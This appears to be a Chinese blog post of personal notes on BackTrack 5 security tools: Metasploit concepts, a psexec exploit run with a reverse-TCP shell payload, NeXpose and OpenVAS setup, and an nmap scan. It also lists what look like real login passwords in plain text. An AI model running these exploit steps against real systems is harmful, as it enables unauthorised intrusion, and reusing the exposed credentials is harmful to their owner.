BT5中的常见工具操作技巧总结
通过nmap,nessus,openvas,nexpose,获取CVE,BID,其它描述信息,到exploit-db.com,1337.com搜索是否有攻击代码。
0. 防火墙:ufw,gufw
MetaSploitFramework:
exploits:使用PAYLOAD的模块,不使用PAYLOAD的模块则为Auxiliary
payload:在远程目标主机运行的代码
encoders:辅助PAYLOADS到达目标主机
Nops:充实PAYLOAD的尺寸
############################
nessus 生成的报告格式选择.nessus(v1)
使用expliot示例:
1)use exploit/windows/smb/psexec
set RHOST remoteip
set PAYLOAD windows/shell/reverse_tcp #设置payload,即在远程目标主机运行的代码,一般选择提供远程网络服务或者反向连接的
set LHOST listenip#当PAYLOAD是反向连接时要设置
set LPORT 4444
set etc…
exploit
########################################################################
1. NeXpose
由rapid7收购msf后的扫描器,与msf对应,exploitable的漏洞有msf之类的攻击链接。
NeXpose默认的postgresql用户为nxpgsql, port:3780,扫描数量限制在8台
生成的报告格式选择nexpose simple xml.
nxadmin:A
启动:
Go to the directory that contains the script that starts NeXpose:
$ cd [installation_directory]/nsc
3. Type the command to run the script:
$ ./nsc.sh
可看到运行的后台提示
或者
/etc/init.d/nexposed restart 启动
WEB访问:
http://ip:3780
其中nexposed的来历:
$ cd [installation_directory]/nsc
Open the nexposeconsole.rc file in your preferred text editing program.
Look for two consecutive lines that read:
#defines
NXP_ROOT=/opt/rapid7/nexpose
The directory in the second line is the default installation directory.
NeXpose Software Installation and Quick-start Guide 16
If you did not use the default directory for installation, change the directory path to the one you chose:
#defines
NXP_ROOT=[installation_directory]
Save and close the nexposeconsole.rc file.
Copy the nexposeconsole.rc file to the /etc/init.d directory, and give it the desired daemon name:
$ cp [installation_directory]/nexposeconsole.rc /etc/init.d/[daemon_name]
Ensure that the daemon can run:
$ chmod +x /etc/init.d/[daemon-name]
Make the daemon start when the operating systems starts:
$ update-rc.d [daemon_name] defaults
Manually starting, stopping, or restarting NeXpose as a daemon in Ubuntu
To manually start, stop, or restart NeXpose as a daemon:
$ /etc/init.d/[daemon_name] <start|stop|restart>
卸载NeXpose:
1. Make sure to stop NeXpose. Otherwise, errors will occur when you reinstall the program.
If you are not running NeXpose as a daemon, simply type the quit command, and press Enter in the shell
in which you are running NeXpose.
If you are running NeXose as a daemon, see Manually starting, stopping, or restarting NeXpose as a daemon in
Ubuntu (on page 16).
2. Run the command to remove the program:
$ rm -fr [installation_directory]
####################################################
2. openvas:
root:shift(AB) loal id pwd is A
wangql:wangql#@!
开启:
命令行输入:
openvassd
openvasmd
openvasad
gsad –http-only -a 127.0.0.1 -p 9392
openvasmd:manager,9390
openvasmd [OPTION...] – Manager of the Open Vulnerability Assessment System
gsad:greenbone security assistant daemon,9392
gsad –http-only -a 127.0.0.1 -p 9392 #这样才能启动gsad并可从WEB访问w
caution: there is a violation between NeXpose and OpenVAS, especially the above gsad command ,so uninstall the nexpose before use the gsad.
openvasad:administrator添加用户,9393
9390,9391,9392,9393
FIX: Start OpenVAS Scanner (openvassd).
FIX: Start OpenVAS Manager (openvasmd).
FIX: Start OpenVAS Administrator (openvasad).
FIX: Start Greenbone Security Assistant (gsad).
####################################################
3.nessus
4.nmap
nmap -A -T4 192.168.10.3-254 -p 135
5.load xmlrpc
用armitage打开
msf console 不支持中文编码显示
info exploit/windows/wins/ms04_045_ins
上一篇: 微信小程序slider组件使用详解